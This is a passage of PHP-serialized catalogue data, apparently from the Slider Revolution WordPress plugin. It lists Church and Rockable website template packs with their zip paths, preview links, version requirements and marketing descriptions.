Template\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"32\";s:9:\"installed\";b:0;}i:378;a:25:{s:2:\"id\";s:3:\"414\";s:5:\"title\";s:12:\"Church About\";s:5:\"alias\";s:12:\"Church-About\";s:3:\"zip\";s:22:\"packs/Church-About.zip\";s:3:\"uid\";s:32:\"8ef133f3f669f06380334a83e27eedbb\";s:3:\"img\";s:23:\"Church-About/slide1.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/church-website-template-dark/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:23:\"Church Website Template\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"32\";s:9:\"installed\";b:0;}i:379;a:25:{s:2:\"id\";s:3:\"415\";s:5:\"title\";s:14:\"Church Pastors\";s:5:\"alias\";s:14:\"Church-Pastors\";s:3:\"zip\";s:24:\"packs/Church-Pastors.zip\";s:3:\"uid\";s:32:\"715edc0833a753b72350b8c974f86f94\";s:3:\"img\";s:25:\"Church-Pastors/slide1.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/church-website-template-dark/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:23:\"Church Website Template\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"32\";s:9:\"installed\";b:0;}i:380;a:25:{s:2:\"id\";s:3:\"416\";s:5:\"title\";s:20:\"Church Photo Gallery\";s:5:\"alias\";s:20:\"Church-Photo-Gallery\";s:3:\"zip\";s:30:\"packs/Church-Photo-Gallery.zip\";s:3:\"uid\";s:32:\"d94808a97149cd5d3b3354a28409ffd7\";s:3:\"img\";s:31:\"Church-Photo-Gallery/slide1.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/church-website-template-dark/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:23:\"Church Website Template\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"32\";s:9:\"installed\";b:0;}i:381;a:25:{s:2:\"id\";s:3:\"417\";s:5:\"title\";s:16:\"Church Community\";s:5:\"alias\";s:16:\"Church-Community\";s:3:\"zip\";s:26:\"packs/Church-Community.zip\";s:3:\"uid\";s:32:\"2244e6a6d7a691653eae2d70765130a7\";s:3:\"img\";s:27:\"Church-Community/slide1.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/church-website-template-dark/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:23:\"Church Website Template\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"32\";s:9:\"installed\";b:0;}i:382;a:25:{s:2:\"id\";s:3:\"418\";s:5:\"title\";s:13:\"Church Sermon\";s:5:\"alias\";s:13:\"Church-Sermon\";s:3:\"zip\";s:23:\"packs/Church-Sermon.zip\";s:3:\"uid\";s:32:\"8fedf983bd55fff0f7a16d9f0a7e5408\";s:3:\"img\";s:24:\"Church-Sermon/slide1.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/church-website-template-dark/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:23:\"Church Website Template\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"32\";s:9:\"installed\";b:0;}i:383;a:25:{s:2:\"id\";s:3:\"419\";s:5:\"title\";s:15:\"Church Contacts\";s:5:\"alias\";s:15:\"Church-Contacts\";s:3:\"zip\";s:25:\"packs/Church-Contacts.zip\";s:3:\"uid\";s:32:\"0b1a6968e75868548fd98e435625c090\";s:3:\"img\";s:26:\"Church-Contacts/slide1.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/church-website-template-dark/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:23:\"Church Website Template\";s:13:\"package_order\";s:1:\"8\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"32\";s:9:\"installed\";b:0;}i:384;a:25:{s:2:\"id\";s:3:\"420\";s:5:\"title\";s:13:\"Church Footer\";s:5:\"alias\";s:13:\"Church-Footer\";s:3:\"zip\";s:23:\"packs/Church-Footer.zip\";s:3:\"uid\";s:32:\"29756685d3dc49e42edada43e6393b7b\";s:3:\"img\";s:24:\"Church-Footer/slide1.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/church-website-template-dark/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:23:\"Church Website Template\";s:13:\"package_order\";s:1:\"9\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"32\";s:9:\"installed\";b:0;}i:385;a:25:{s:2:\"id\";s:3:\"421\";s:5:\"title\";s:29:\"Church Light Website Template\";s:5:\"alias\";s:29:\"church-light-website-template\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:37:\"church-light-website-template-package\";s:3:\"img\";s:42:\"packages/church-light-website-template.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/church-website-template-light/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Church Light Website Template\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"33\";s:9:\"installed\";b:0;}i:386;a:25:{s:2:\"id\";s:3:\"422\";s:5:\"title\";s:19:\"Church Light Header\";s:5:\"alias\";s:19:\"Church-Light-Header\";s:3:\"zip\";s:29:\"packs/Church-Light-Header.zip\";s:3:\"uid\";s:32:\"81c00f4b52cf55214de919e3f13121fc\";s:3:\"img\";s:30:\"Church-Light-Header/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/church-website-template-light/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Church Light Website Template\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"33\";s:9:\"installed\";b:0;}i:387;a:25:{s:2:\"id\";s:3:\"423\";s:5:\"title\";s:28:\"Church Light Upcoming Events\";s:5:\"alias\";s:28:\"Church-Light-Upcoming-Events\";s:3:\"zip\";s:38:\"packs/Church-Light-Upcoming-Events.zip\";s:3:\"uid\";s:32:\"963a49f4be0557ac5f3ee61d256f5bda\";s:3:\"img\";s:39:\"Church-Light-Upcoming-Events/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/church-website-template-light/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Church Light Website Template\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"33\";s:9:\"installed\";b:0;}i:388;a:25:{s:2:\"id\";s:3:\"424\";s:5:\"title\";s:18:\"Church Light About\";s:5:\"alias\";s:18:\"Church-Light-About\";s:3:\"zip\";s:28:\"packs/Church-Light-About.zip\";s:3:\"uid\";s:32:\"d46c8e8e6f80e6bfedb54f1cdc49e7e6\";s:3:\"img\";s:29:\"Church-Light-About/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/church-website-template-light/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Church Light Website Template\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"33\";s:9:\"installed\";b:0;}i:389;a:25:{s:2:\"id\";s:3:\"425\";s:5:\"title\";s:20:\"Church Light Pastors\";s:5:\"alias\";s:20:\"Church-Light-Pastors\";s:3:\"zip\";s:30:\"packs/Church-Light-Pastors.zip\";s:3:\"uid\";s:32:\"7cc3dec61556e2291d6f38c1ea5e983f\";s:3:\"img\";s:31:\"Church-Light-Pastors/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/church-website-template-light/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Church Light Website Template\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"33\";s:9:\"installed\";b:0;}i:390;a:25:{s:2:\"id\";s:3:\"426\";s:5:\"title\";s:26:\"Church Light Photo Gallery\";s:5:\"alias\";s:26:\"Church-Light-Photo-Gallery\";s:3:\"zip\";s:36:\"packs/Church-Light-Photo-Gallery.zip\";s:3:\"uid\";s:32:\"9e13100179b9b700b005693eeca57902\";s:3:\"img\";s:37:\"Church-Light-Photo-Gallery/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/church-website-template-light/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Church Light Website Template\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"33\";s:9:\"installed\";b:0;}i:391;a:25:{s:2:\"id\";s:3:\"427\";s:5:\"title\";s:22:\"Church Light Community\";s:5:\"alias\";s:22:\"Church-Light-Community\";s:3:\"zip\";s:32:\"packs/Church-Light-Community.zip\";s:3:\"uid\";s:32:\"14fcc0d43d899fd96116bdbc57c7c5ea\";s:3:\"img\";s:33:\"Church-Light-Community/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/church-website-template-light/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Church Light Website Template\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"33\";s:9:\"installed\";b:0;}i:392;a:25:{s:2:\"id\";s:3:\"428\";s:5:\"title\";s:19:\"Church Light Sermon\";s:5:\"alias\";s:19:\"Church-Light-Sermon\";s:3:\"zip\";s:29:\"packs/Church-Light-Sermon.zip\";s:3:\"uid\";s:32:\"fc30be7e703bc7b235665c36baa80e4e\";s:3:\"img\";s:30:\"Church-Light-Sermon/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/church-website-template-light/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Church Light Website Template\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"33\";s:9:\"installed\";b:0;}i:393;a:25:{s:2:\"id\";s:3:\"429\";s:5:\"title\";s:21:\"Church Light Contacts\";s:5:\"alias\";s:21:\"Church-Light-Contacts\";s:3:\"zip\";s:31:\"packs/Church-Light-Contacts.zip\";s:3:\"uid\";s:32:\"ed83d8fa63ecb59cf42656068ecf8d25\";s:3:\"img\";s:32:\"Church-Light-Contacts/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/church-website-template-light/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Church Light Website Template\";s:13:\"package_order\";s:1:\"8\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"33\";s:9:\"installed\";b:0;}i:394;a:25:{s:2:\"id\";s:3:\"430\";s:5:\"title\";s:19:\"Church Light Footer\";s:5:\"alias\";s:19:\"Church-Light-Footer\";s:3:\"zip\";s:29:\"packs/Church-Light-Footer.zip\";s:3:\"uid\";s:32:\"a168772865fd5dcf6229c9c6a49dff73\";s:3:\"img\";s:30:\"Church-Light-Footer/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/church-website-template-light/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Church Light Website Template\";s:13:\"package_order\";s:1:\"9\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"33\";s:9:\"installed\";b:0;}i:395;a:25:{s:2:\"id\";s:3:\"431\";s:5:\"title\";s:25:\"Rockable Website Template\";s:5:\"alias\";s:25:\"rockable-website-template\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:33:\"rockable-website-template-package\";s:3:\"img\";s:38:\"packages/rockable-website-template.jpg\";s:7:\"preview\";s:60:\"https://revolution.themepunch.com/rockable-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.3\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:172:\"<span class=\"ttm_content\">The Rockable Website Template can present your Festival or Concert oriented website in a unique one-pager.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:25:\"Rockable Website Template\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"34\";s:9:\"installed\";b:0;}i:396;a:25:{s:2:\"id\";s:3:\"432\";s:5:\"title\";s:13:\"Rockable Menu\";s:5:\"alias\";s:13:\"rockable-menu\";s:3:\"zip\";s:23:\"packs/rockable-menu.zip\";s:3:\"uid\";s:32:\"92d18f7ff38f22ff411a4ef4d9f54934\";s:3:\"img\";s:24:\"rockable-menu/slide1.jpg\";s:7:\"preview\";s:60:\"https://revolution.themepunch.com/rockable-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.3\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:172:\"<span class=\"ttm_content\">The Rockable Website Template can present your Festival or Concert oriented website in a unique one-pager.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:25:\"Rockable Website Template\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"34\";s:9:\"installed\";b:0;}i:397;a:25:{s:2:\"id\";s:3:\"433\";s:5:\"title\";s:13:\"Rockable Hero\";s:5:\"alias\";s:13:\"rockable-hero\";s:3:\"zip\";s:23:\"packs/rockable-hero.zip\";s:3:\"uid\";s:32:\"ba16b28d6bde95910cbce572bb251208\";s:3:\"img\";s:24:\"rockable-hero/slide1.jpg\";s:7:\"preview\";s:60:\"https://revolution.themepunch.com/rockable-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.3\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:172:\"<span class=\"ttm_content\">The Rockable Website Template can present your Festival or Concert oriented website in a unique one-pager.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:25:\"Rockable Website 